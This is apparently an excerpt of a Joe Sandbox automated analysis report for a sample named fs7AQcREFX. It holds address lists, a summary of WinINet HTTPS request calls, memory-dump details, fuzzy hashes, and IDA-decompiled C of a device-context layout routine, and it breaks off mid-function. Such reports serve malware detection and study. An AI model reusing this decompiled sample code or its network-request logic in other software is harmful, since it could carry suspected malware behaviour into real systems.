                                                                                                                                                                                                                                                                                          0x04002a35
                                                                                                                                                                                                                                                                                          0x04002a3f
                                                                                                                                                                                                                                                                                          0x04002a4a
                                                                                                                                                                                                                                                                                          0x04002a73
                                                                                                                                                                                                                                                                                          0x04002a80
                                                                                                                                                                                                                                                                                          0x04002a90
                                                                                                                                                                                                                                                                                          0x04002a9f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002a82
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002a80
                                                                                                                                                                                                                                                                                          0x04002aaa
                                                                                                                                                                                                                                                                                          0x04002aaa
                                                                                                                                                                                                                                                                                          0x04002acb
                                                                                                                                                                                                                                                                                          0x04002acb
                                                                                                                                                                                                                                                                                          0x04002ad5
                                                                                                                                                                                                                                                                                          0x04002ad5
                                                                                                                                                                                                                                                                                          0x04002adf
                                                                                                                                                                                                                                                                                          0x04002adf
                                                                                                                                                                                                                                                                                          0x04002949
                                                                                                                                                                                                                                                                                          0x04002aeb

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(0400C398,00000001,00000000,00000000,00000000), ref: 0400293C
                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,00000000,000001BB,0400C3D2,0400C3D1,00000003,00000000,00000000), ref: 0400296C
                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,GET,0400C3D8,1.1,00000000,00000000,80800000,00000000), ref: 0400299D
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 040029C0
                                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 040029E8
                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002A0E
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0400C3EC,00000000,00000000), ref: 04002A1C
                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,0400C3EC,00000000), ref: 04002A2B
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 04002A73
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04002AAF
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002ACB
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002AD5
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002ADF
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                                                          • String ID: 1.1$GET$https://%s
                                                                                                                                                                                                                                                                                          • API String ID: 2082764430-1670984264
                                                                                                                                                                                                                                                                                          • Opcode ID: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                                          • Instruction ID: 6d54c3b05ff69590bd14da6a4fff8ed2da31e3bdf774b399ca20979b5291bdcc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02510C71944218AFEB24CF94DC89BEEB7B4EB49700F108598F605B62C0C7B8AE94CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                          			E000F8E40(struct HWND__* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v68;
                                                                                                                                                                                                                                                                                          				void* _v72;
                                                                                                                                                                                                                                                                                          				signed int _v76;
                                                                                                                                                                                                                                                                                          				int _v80;
                                                                                                                                                                                                                                                                                          				int _v84;
                                                                                                                                                                                                                                                                                          				signed int _v88;
                                                                                                                                                                                                                                                                                          				int _v92;
                                                                                                                                                                                                                                                                                          				intOrPtr _v96;
                                                                                                                                                                                                                                                                                          				int _v100;
                                                                                                                                                                                                                                                                                          				int _v104;
                                                                                                                                                                                                                                                                                          				long _v116;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v120;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                                                                                                          				int _t102;
                                                                                                                                                                                                                                                                                          				int _t108;
                                                                                                                                                                                                                                                                                          				signed int _t113;
                                                                                                                                                                                                                                                                                          				signed int _t115;
                                                                                                                                                                                                                                                                                          				signed int _t117;
                                                                                                                                                                                                                                                                                          				long _t119;
                                                                                                                                                                                                                                                                                          				signed int _t123;
                                                                                                                                                                                                                                                                                          				signed int _t126;
                                                                                                                                                                                                                                                                                          				int _t129;
                                                                                                                                                                                                                                                                                          				void* _t136;
                                                                                                                                                                                                                                                                                          				int _t153;
                                                                                                                                                                                                                                                                                          				int* _t164;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t166;
                                                                                                                                                                                                                                                                                          				void* _t167;
                                                                                                                                                                                                                                                                                          				intOrPtr _t170;
                                                                                                                                                                                                                                                                                          				void* _t172;
                                                                                                                                                                                                                                                                                          				signed int _t173;
                                                                                                                                                                                                                                                                                          				void* _t174;
                                                                                                                                                                                                                                                                                          				void* _t175;
                                                                                                                                                                                                                                                                                          				void* _t176;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t156 = __edx;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F718);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t175 = _t174 - 0x68;
                                                                                                                                                                                                                                                                                          				_t86 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t87 = _t86 ^ _t173;
                                                                                                                                                                                                                                                                                          				_v24 = _t87;
                                                                                                                                                                                                                                                                                          				_push(_t87);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t89 = _a4;
                                                                                                                                                                                                                                                                                          				_v96 = _a4;
                                                                                                                                                                                                                                                                                          				_t166 = E000FC830(_t176, _a4 + 0x4b8,  *((intOrPtr*)(_t89 + 0x4c0)));
                                                                                                                                                                                                                                                                                          				_v120 = _t166;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_t166 != 0) {
                                                                                                                                                                                                                                                                                          					_v100 = GetDeviceCaps(_t166, 0x6f);
                                                                                                                                                                                                                                                                                          					_v104 = GetDeviceCaps(_t166, 0x6e);
                                                                                                                                                                                                                                                                                          					_t94 = GetDeviceCaps(_t166, 0x70);
                                                                                                                                                                                                                                                                                          					SetViewportOrgEx(_t166,  ~_t94,  ~(GetDeviceCaps(_t166, 0x71)), 0);
                                                                                                                                                                                                                                                                                          					_v104 = MulDiv(_v104, 0x5a0, GetDeviceCaps(_t166, 0x58));
                                                                                                                                                                                                                                                                                          					_t102 = MulDiv(_v100, 0x5a0, GetDeviceCaps(_t166, 0x5a));
                                                                                                                                                                                                                                                                                          					_t170 = _v96;
                                                                                                                                                                                                                                                                                          					_v100 = _t102;
                                                                                                                                                                                                                                                                                          					_v80 = _t102;
                                                                                                                                                                                                                                                                                          					_v92 = 0;
                                                                                                                                                                                                                                                                                          					_v88 = 0;
                                                                                                                                                                                                                                                                                          					_v84 = _v104;
                                                                                                                                                                                                                                                                                          					_v92 = MulDiv( *(_t170 + 0x514), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          					_v84 = _v84 - MulDiv( *(_t170 + 0x51c), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          					_v88 = _v88 + MulDiv( *(_t170 + 0x518), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          					_t108 = MulDiv( *(_t170 + 0x520), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          					_v64 = _v92;
                                                                                                                                                                                                                                                                                          					_v72 = _t166;
                                                                                                                                                                                                                                                                                          					_v68 = _t166;
                                                                                                                                                                                                                                                                                          					_v60 = _v88;
                                                                                                                                                                                                                                                                                          					_v56 = _v84;
                                                                                                                                                                                                                                                                                          					_v52 = _v80 - _t108;
                                                                                                                                                                                                                                                                                          					_v48 = 0;
                                                                                                                                                                                                                                                                                          					_v44 = 0;
                                                                                                                                                                                                                                                                                          					_v40 = _v104;
                                                                                                                                                                                                                                                                                          					_v36 = _v100;
                                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                                          					_v28 = 0xffffffff;
                                                                                                                                                                                                                                                                                          					_v116 = SendMessageA( *(_t170 + 0x254), 0xe, 0, 0);
                                                                                                                                                                                                                                                                                          					_t113 =  *(_t170 + 0x52c);
                                                                                                                                                                                                                                                                                          					__eflags = _t113;
                                                                                                                                                                                                                                                                                          					if(_t113 != 0) {
                                                                                                                                                                                                                                                                                          						E00105DE2(_t113);
                                                                                                                                                                                                                                                                                          						_t175 = _t175 + 4;
                                                                                                                                                                                                                                                                                          						 *(_t170 + 0x52c) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *(_t170 + 0x530) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t170 + 0x534) = 0;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						_t115 =  *(_t170 + 0x534);
                                                                                                                                                                                                                                                                                          						__eflags =  *(_t170 + 0x530) - _t115;
                                                                                                                                                                                                                                                                                          						if( *(_t170 + 0x530) != _t115) {
                                                                                                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                                                                                                          							_t117 =  *(_t170 + 0x52c) +  *(_t170 + 0x530) * 4;
                                                                                                                                                                                                                                                                                          							__eflags = _t117;
                                                                                                                                                                                                                                                                                          							if(_t117 != 0) {
                                                                                                                                                                                                                                                                                          								 *_t117 = _v32;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t72 = _t170 + 0x530;
                                                                                                                                                                                                                                                                                          							 *_t72 =  *(_t170 + 0x530) + 1;
                                                                                                                                                                                                                                                                                          							__eflags =  *_t72;
                                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t153 =  *(_t170 + 0x52c);
                                                                                                                                                                                                                                                                                          							_t164 =  &_v32;
                                                                                                                                                                                                                                                                                          							__eflags = _t164 - _t153;
                                                                                                                                                                                                                                                                                          							if(_t164 < _t153) {
                                                                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                                                                          								__eflags = _t115;
                                                                                                                                                                                                                                                                                          								if(_t115 != 0) {
                                                                                                                                                                                                                                                                                          									_t126 =  *(_t170 + 0x530) +  *(_t170 + 0x530);
                                                                                                                                                                                                                                                                                          									__eflags = _t126;
                                                                                                                                                                                                                                                                                          									_v76 = _t126;
                                                                                                                                                                                                                                                                                          									if(_t126 >= 0) {
                                                                                                                                                                                                                                                                                          										__eflags = _t126 - 0x1fffffff;
                                                                                                                                                                                                                                                                                          										if(_t126 <= 0x1fffffff) {
                                                                                                                                                                                                                                                                                          											goto L12;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_v76 = 1;
                                                                                                                                                                                                                                                                                          									L12:
                                                                                                                                                                                                                                                                                          									_t129 = E00106254( *(_t170 + 0x52c), _v76, 4);
                                                                                                                                                                                                                                                                                          									_t175 = _t175 + 0xc;
                                                                                                                                                                                                                                                                                          									__eflags = _t129;
                                                                                                                                                                                                                                                                                          									if(_t129 != 0) {
                                                                                                                                                                                                                                                                                          										 *(_t170 + 0x534) = _v76;
                                                                                                                                                                                                                                                                                          										 *(_t170 + 0x52c) = _t129;
                                                                                                                                                                                                                                                                                          										goto L14;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                                                                                                          								_t119 = SendMessageA( *(_t170 + 0x254), 0x439, 0,  &_v72);
                                                                                                                                                                                                                                                                                          								__eflags = _t119 - _v32 - 0xffffffff;
                                                                                                                                                                                                                                                                                          								if(_t119 - _v32 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									goto L18;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _t164 - _t153 + _t115 * 4;
                                                                                                                                                                                                                                                                                          								if(_t164 < _t153 + _t115 * 4) {
                                                                                                                                                                                                                                                                                          									_push(0x80004005);
                                                                                                                                                                                                                                                                                          									E000F1170(_t164);
                                                                                                                                                                                                                                                                                          									L21:
                                                                                                                                                                                                                                                                                          									__eflags =  *(_t170 + 0x530) - 1;
                                                                                                                                                                                                                                                                                          									E000FCF50( *(_t170 + 0x530) - 1, _t170 + 0x52c);
                                                                                                                                                                                                                                                                                          									_t170 = _v96;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L22:
                                                                                                                                                                                                                                                                                          						_t156 =  *(_t170 + 0x254);
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t170 + 0x254), 0x439, 0, 0);
                                                                                                                                                                                                                                                                                          						DeleteDC(_t166);
                                                                                                                                                                                                                                                                                          						_t123 = 1;
                                                                                                                                                                                                                                                                                          						goto L23;
                                                                                                                                                                                                                                                                                          						L18:
                                                                                                                                                                                                                                                                                          						_v32 = _t119;
                                                                                                                                                                                                                                                                                          						__eflags = _t119 - _v116;
                                                                                                                                                                                                                                                                                          					} while (_t119 < _v116);
                                                                                                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t123 = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L23:
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t167);
                                                                                                                                                                                                                                                                                          				_pop(_t172);
                                                                                                                                                                                                                                                                                          				_pop(_t136);
                                                                                                                                                                                                                                                                                          				return E001059E6(_t123, _t136, _v24 ^ _t173, _t156, _t167, _t172);
                                                                                                                                                                                                                                                                                          			}






















































                                                                                                                                                                                                                                                                                          0x000f8e40
                                                                                                                                                                                                                                                                                          0x000f8e43
                                                                                                                                                                                                                                                                                          0x000f8e45
                                                                                                                                                                                                                                                                                          0x000f8e50
                                                                                                                                                                                                                                                                                          0x000f8e51
                                                                                                                                                                                                                                                                                          0x000f8e54
                                                                                                                                                                                                                                                                                          0x000f8e59
                                                                                                                                                                                                                                                                                          0x000f8e5b
                                                                                                                                                                                                                                                                                          0x000f8e61
                                                                                                                                                                                                                                                                                          0x000f8e65
                                                                                                                                                                                                                                                                                          0x000f8e6b
                                                                                                                                                                                                                                                                                          0x000f8e74
                                                                                                                                                                                                                                                                                          0x000f8e83
                                                                                                                                                                                                                                                                                          0x000f8e85
                                                                                                                                                                                                                                                                                          0x000f8e88
                                                                                                                                                                                                                                                                                          0x000f8e91
                                                                                                                                                                                                                                                                                          0x000f8ea8
                                                                                                                                                                                                                                                                                          0x000f8eb0
                                                                                                                                                                                                                                                                                          0x000f8eb3
                                                                                                                                                                                                                                                                                          0x000f8ec5
                                                                                                                                                                                                                                                                                          0x000f8ee5
                                                                                                                                                                                                                                                                                          0x000f8ef4
                                                                                                                                                                                                                                                                                          0x000f8ef6
                                                                                                                                                                                                                                                                                          0x000f8f01
                                                                                                                                                                                                                                                                                          0x000f8f04
                                                                                                                                                                                                                                                                                          0x000f8f15
                                                                                                                                                                                                                                                                                          0x000f8f18
                                                                                                                                                                                                                                                                                          0x000f8f1b
                                                                                                                                                                                                                                                                                          0x000f8f31
                                                                                                                                                                                                                                                                                          0x000f8f3c
                                                                                                                                                                                                                                                                                          0x000f8f4c
                                                                                                                                                                                                                                                                                          0x000f8f60
                                                                                                                                                                                                                                                                                          0x000f8f6d
                                                                                                                                                                                                                                                                                          0x000f8f73
                                                                                                                                                                                                                                                                                          0x000f8f76
                                                                                                                                                                                                                                                                                          0x000f8f79
                                                                                                                                                                                                                                                                                          0x000f8f82
                                                                                                                                                                                                                                                                                          0x000f8f8b
                                                                                                                                                                                                                                                                                          0x000f8f91
                                                                                                                                                                                                                                                                                          0x000f8f94
                                                                                                                                                                                                                                                                                          0x000f8f9d
                                                                                                                                                                                                                                                                                          0x000f8fa0
                                                                                                                                                                                                                                                                                          0x000f8fa3
                                                                                                                                                                                                                                                                                          0x000f8faa
                                                                                                                                                                                                                                                                                          0x000f8fb7
                                                                                                                                                                                                                                                                                          0x000f8fba
                                                                                                                                                                                                                                                                                          0x000f8fc0
                                                                                                                                                                                                                                                                                          0x000f8fc2
                                                                                                                                                                                                                                                                                          0x000f8fc5
                                                                                                                                                                                                                                                                                          0x000f8fca
                                                                                                                                                                                                                                                                                          0x000f8fcd
                                                                                                                                                                                                                                                                                          0x000f8fcd
                                                                                                                                                                                                                                                                                          0x000f8fd9
                                                                                                                                                                                                                                                                                          0x000f8fdf
                                                                                                                                                                                                                                                                                          0x000f8ff0
                                                                                                                                                                                                                                                                                          0x000f8ff0
                                                                                                                                                                                                                                                                                          0x000f8ff6
                                                                                                                                                                                                                                                                                          0x000f8ffc
                                                                                                                                                                                                                                                                                          0x000f905f
                                                                                                                                                                                                                                                                                          0x000f906b
                                                                                                                                                                                                                                                                                          0x000f906e
                                                                                                                                                                                                                                                                                          0x000f9070
                                                                                                                                                                                                                                                                                          0x000f9075
                                                                                                                                                                                                                                                                                          0x000f9075
                                                                                                                                                                                                                                                                                          0x000f9077
                                                                                                                                                                                                                                                                                          0x000f9077
                                                                                                                                                                                                                                                                                          0x000f9077
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f8ffe
                                                                                                                                                                                                                                                                                          0x000f8ffe
                                                                                                                                                                                                                                                                                          0x000f9004
                                                                                                                                                                                                                                                                                          0x000f9007
                                                                                                                                                                                                                                                                                          0x000f9009
                                                                                                                                                                                                                                                                                          0x000f9016
                                                                                                                                                                                                                                                                                          0x000f9016
                                                                                                                                                                                                                                                                                          0x000f9018
                                                                                                                                                                                                                                                                                          0x000f9029
                                                                                                                                                                                                                                                                                          0x000f9029
                                                                                                                                                                                                                                                                                          0x000f902b
                                                                                                                                                                                                                                                                                          0x000f902e
                                                                                                                                                                                                                                                                                          0x000f9030
                                                                                                                                                                                                                                                                                          0x000f9035
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9035
                                                                                                                                                                                                                                                                                          0x000f901a
                                                                                                                                                                                                                                                                                          0x000f901a
                                                                                                                                                                                                                                                                                          0x000f9037
                                                                                                                                                                                                                                                                                          0x000f9044
                                                                                                                                                                                                                                                                                          0x000f9049
                                                                                                                                                                                                                                                                                          0x000f904c
                                                                                                                                                                                                                                                                                          0x000f904e
                                                                                                                                                                                                                                                                                          0x000f9053
                                                                                                                                                                                                                                                                                          0x000f9059
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9059
                                                                                                                                                                                                                                                                                          0x000f904e
                                                                                                                                                                                                                                                                                          0x000f907d
                                                                                                                                                                                                                                                                                          0x000f908f
                                                                                                                                                                                                                                                                                          0x000f909a
                                                                                                                                                                                                                                                                                          0x000f909d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f900b
                                                                                                                                                                                                                                                                                          0x000f900e
                                                                                                                                                                                                                                                                                          0x000f9010
                                                                                                                                                                                                                                                                                          0x000f90ad
                                                                                                                                                                                                                                                                                          0x000f90b2
                                                                                                                                                                                                                                                                                          0x000f90b7
                                                                                                                                                                                                                                                                                          0x000f90bd
                                                                                                                                                                                                                                                                                          0x000f90c4
                                                                                                                                                                                                                                                                                          0x000f90c9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9010
                                                                                                                                                                                                                                                                                          0x000f9009
                                                                                                                                                                                                                                                                                          0x000f90cc
                                                                                                                                                                                                                                                                                          0x000f90cc
                                                                                                                                                                                                                                                                                          0x000f90dc
                                                                                                                                                                                                                                                                                          0x000f90e3
                                                                                                                                                                                                                                                                                          0x000f90e9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f909f
                                                                                                                                                                                                                                                                                          0x000f909f
                                                                                                                                                                                                                                                                                          0x000f90a2
                                                                                                                                                                                                                                                                                          0x000f90a2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f8e93
                                                                                                                                                                                                                                                                                          0x000f8e93
                                                                                                                                                                                                                                                                                          0x000f8e93
                                                                                                                                                                                                                                                                                          0x000f90eb
                                                                                                                                                                                                                                                                                          0x000f90ee
                                                                                                                                                                                                                                                                                          0x000f90f6
                                                                                                                                                                                                                                                                                          0x000f90f7
                                                                                                                                                                                                                                                                                          0x000f90f8
                                                                                                                                                                                                                                                                                          0x000f9106

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FC830: CreateDCA.GDI32(00000000,?,00000000,?), ref: 000FC8C1
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006F), ref: 000F8EA3
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006E), ref: 000F8EAB
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000070), ref: 000F8EB3
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000071), ref: 000F8EBA
                                                                                                                                                                                                                                                                                          • SetViewportOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 000F8EC5
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 000F8ECE
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,00000000), ref: 000F8EE0
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000F8EE8
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,00000000), ref: 000F8EF4
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,000003E8), ref: 000F8F1E
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,000003E8), ref: 000F8F34
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,000003E8), ref: 000F8F4A
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,000003E8), ref: 000F8F60
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 000F8FB1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CapsDevice$CreateMessageSendViewport
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 363734762-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 55d4911f22bd36252ab15f4c00f9cd48dc81371f1055c97e8cc3753cbe2f03e9
                                                                                                                                                                                                                                                                                          • Instruction ID: 1e190e84196149b81e7ebd9bb661a823d11c3700e0964a1688b26c0fae9745e1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55d4911f22bd36252ab15f4c00f9cd48dc81371f1055c97e8cc3753cbe2f03e9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44812970E00708AFDB10DFA5CD85BAEBBF9AF48711F10451AE619EB680DB74A941CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E000FF090(void* __ebx, intOrPtr* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v211;
                                                                                                                                                                                                                                                                                          				char _v212;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v216;
                                                                                                                                                                                                                                                                                          				void* _v220;
                                                                                                                                                                                                                                                                                          				void* _v224;
                                                                                                                                                                                                                                                                                          				CHAR* _v228;
                                                                                                                                                                                                                                                                                          				CHAR* _v232;
                                                                                                                                                                                                                                                                                          				CHAR* _v236;
                                                                                                                                                                                                                                                                                          				CHAR* _v240;
                                                                                                                                                                                                                                                                                          				CHAR* _v244;
                                                                                                                                                                                                                                                                                          				CHAR* _v248;
                                                                                                                                                                                                                                                                                          				CHAR* _v252;
                                                                                                                                                                                                                                                                                          				void* _v256;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                                                                                                          				intOrPtr _t60;
                                                                                                                                                                                                                                                                                          				signed char _t65;
                                                                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t121;
                                                                                                                                                                                                                                                                                          				RECT* _t122;
                                                                                                                                                                                                                                                                                          				signed int _t125;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t106 = __edx;
                                                                                                                                                                                                                                                                                          				_t89 = __ebx;
                                                                                                                                                                                                                                                                                          				_t58 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t58 ^ _t125;
                                                                                                                                                                                                                                                                                          				_t123 = __edx;
                                                                                                                                                                                                                                                                                          				_t60 =  *((intOrPtr*)(__edx + 0xc));
                                                                                                                                                                                                                                                                                          				_v216 = __ecx;
                                                                                                                                                                                                                                                                                          				if(_t60 != 1) {
